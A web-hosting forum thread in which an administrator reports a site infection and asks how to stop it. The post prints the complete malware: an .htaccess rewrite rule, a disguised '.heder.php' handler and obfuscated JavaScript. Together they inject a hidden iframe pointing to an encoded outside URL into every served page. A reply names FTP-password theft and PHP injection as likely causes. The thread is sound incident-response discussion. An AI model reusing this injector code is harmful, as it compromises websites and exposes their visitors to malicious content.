how to stop .heder.php and prevent .htaccess to be altered?

bigboy

Verified User
Joined
Nov 25, 2005
Messages
231
Location
USA
We have recently attacked by a malware and this is what it do.

it altered the htacess file and placing the following code:

#mmmmd
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !.heder.php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) \.heder.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
</IfModule>

then it writes a php file named: .heder.php to mimic the name header.php so that it would not be easily noticed at first glance.

heder.php has the following code:

<?php
$frame_code = '<!--pCQegcQpSdDlcHjr--><script>/*kKMIkqZKzudmzolxbrOHcWc*/var YtJzBU=document;/*IiTSklCVzskOGQGJRjfotls*/function UvrUmwYA(fXCunYmB)/*oMvBLMFdAhNBEswhcTQORaUK*/{var DdKQrsBtb = "",/*qMhJXHFXbplaeBhn*/MAueQJPqK=0;for(MAueQJPqK=fXCunYmB.length-1;MAueQJPqK >= 0;MAueQJPqK--)/*_QFpgDWzoZ_IUa_EYAAsBSz*/{DdKQrsBtb+=fXCunYmB.charAt(MAueQJPqK);}return DdKQrsBtb;/*MObrkBcjKvUUEMQ*/}/*uTerrZNumvQKTuJLpL*/function lAzxGtC(XFRZIMF_)/*kKMIkqZKzudmzolxbrOHcWc*/{/*qMhJXHFXbplaeBhn*/XFRZIMF_ = XFRZIMF_.replace(/[\.]/g, "%");/*DQloCfcNIAbcedryffCLqfJb*/XFRZIMF_=unescape(XFRZIMF_);/*dYwdhKVcIC*/return UvrUmwYA(XFRZIMF_);/*labNWxLCjH_vHfgqHzTeFJpk*/}/*mDxpBbGaaSRIv*/function gqDmBRQ(){/*qMhJXHFXbplaeBhn*/YtJzBU.write("<style>.JIjzCtPmog{width:1px;height:1px;border:none;visibility:hidden}</style>");/*_QFpgDWzoZ_IUa_EYAAsBSz*//*_QFpgDWzoZ_IUa_EYAAsBSz*/var rPnbv="<iframe id=\"fWMiliU\" src=\"x\" class=\"JIjzCtPmog\"></iframe>";/*MObrkBcjKvUUEMQ*//*XveYPeKLuEKekySlz*/var eukscm=rPnbv.replace(/[\+x]/g,lAzxGtC(".70.68.70.2e.6e.69.2f.73.74.61.74.73.2f.6f.66.6e.69.2e.72.65.74.6e.75.6f.63.2d.65.76.69.6c.2e.77.77.77.2f.2f.3a.70.74.74.68"));/*qMhJXHFXbplaeBhn*//*EDoaNtIMGMc*/return eukscm;/*rqszXRaWBkPDChdYQJhZ*//*ZanD_dBPp_pbECRk*/}/*EDoaNtIMGMc*//*IiTSklCVzskOGQGJRjfotls*//*ZanD_dBPp_pbECRk*//*VAggMvx_ioGGV*/YtJzBU.writeln(gqDmBRQ());/*PPOfbNdeQEktSYITseyRSquT*//*mDxpBbGaaSRIv*//*eUChBuePLDO*/</script><!--pCQegcQpSdDlcHjr-->';

function get_file_dir_($file) {
global $argv;
$dir = dirname(getcwd() . '/' . $file);
$curDir = getcwd();
chdir($dir);
$dir = getcwd();
chdir($curDir);
return $dir;
}

function callback($data)
{
global $frame_code;
if(preg_match("/(<.*?body.*?>)/i", $data) > 0)
return preg_replace("/(<.*?body.*?>)/i", "\\1 ".$frame_code, $data, 1);
else return $data.$frame_code;
}

ob_start('callback');
$file = $_GET['qq'];
chdir(get_file_dir_($file));

include($file);
?>

what it does is the what ever page request your visitor makes, it injects the following codes just after the <body> tag:

<!--pCQegcQpSdDlcHjr--><script>/*kKMIkqZKzudmzolxbrOHcWc*/var YtJzBU=document;/*IiTSklCVzskOGQGJRjfotls*/function UvrUmwYA(fXCunYmB)/*oMvBLMFdAhNBEswhcTQORaUK*/{var DdKQrsBtb = "",/*qMhJXHFXbplaeBhn*/MAueQJPqK=0;for(MAueQJPqK=fXCunYmB.length-1;MAueQJPqK >= 0;MAueQJPqK--)/*_QFpgDWzoZ_IUa_EYAAsBSz*/{DdKQrsBtb+=fXCunYmB.charAt(MAueQJPqK);}return DdKQrsBtb;/*MObrkBcjKvUUEMQ*/}/*uTerrZNumvQKTuJLpL*/function lAzxGtC(XFRZIMF_)/*kKMIkqZKzudmzolxbrOHcWc*/{/*qMhJXHFXbplaeBhn*/XFRZIMF_ = XFRZIMF_.replace(/[\.]/g, "%");/*DQloCfcNIAbcedryffCLqfJb*/XFRZIMF_=unescape(XFRZIMF_);/*dYwdhKVcIC*/return UvrUmwYA(XFRZIMF_);/*labNWxLCjH_vHfgqHzTeFJpk*/}/*mDxpBbGaaSRIv*/function gqDmBRQ(){/*qMhJXHFXbplaeBhn*/YtJzBU.write("<style>.JIjzCtPmog{width:1px;height:1px;border:none;visibility:hidden}</style>");/*_QFpgDWzoZ_IUa_EYAAsBSz*//*_QFpgDWzoZ_IUa_EYAAsBSz*/var rPnbv="<iframe id=\"fWMiliU\" src=\"x\" class=\"JIjzCtPmog\"></iframe>";/*MObrkBcjKvUUEMQ*//*XveYPeKLuEKekySlz*/var eukscm=rPnbv.replace(/[\+x]/g,lAzxGtC(".70.68.70.2e.6e.69.2f.73.74.61.74.73.2f.6f.66.6e.69.2e.72.65.74.6e.75.6f.63.2d.65.76.69.6c.2e.77.77.77.2f.2f.3a.70.74.74.68"));/*qMhJXHFXbplaeBhn*//*EDoaNtIMGMc*/return eukscm;/*rqszXRaWBkPDChdYQJhZ*//*ZanD_dBPp_pbECRk*/}/*EDoaNtIMGMc*//*IiTSklCVzskOGQGJRjfotls*//*ZanD_dBPp_pbECRk*//*VAggMvx_ioGGV*/YtJzBU.writeln(gqDmBRQ());/*PPOfbNdeQEktSYITseyRSquT*//*mDxpBbGaaSRIv*//*eUChBuePLDO*/</script><!--pCQegcQpSdDlcHjr-->


We are tracking down the source of this problem but we are having difficulty finding it.

We change passwords every now and then but it simply comes back.

Does anyone encountered the same problem or have some ideas to prevent this?
 
You must known that the most recent attacks of this type use two different approach vectors:

- FTP password stealing from the client installed within a developer/customer machine

This kind of vulnerability can be quite difficult to eradicate if your developers/customers don't know what an anti-virus is or what the risks of saving the FTP password within their client are. Send a letter to each one of them.

- PHP code injection

Check and update all of the software you manage, and make your customers do the same thing.
 
Back
Top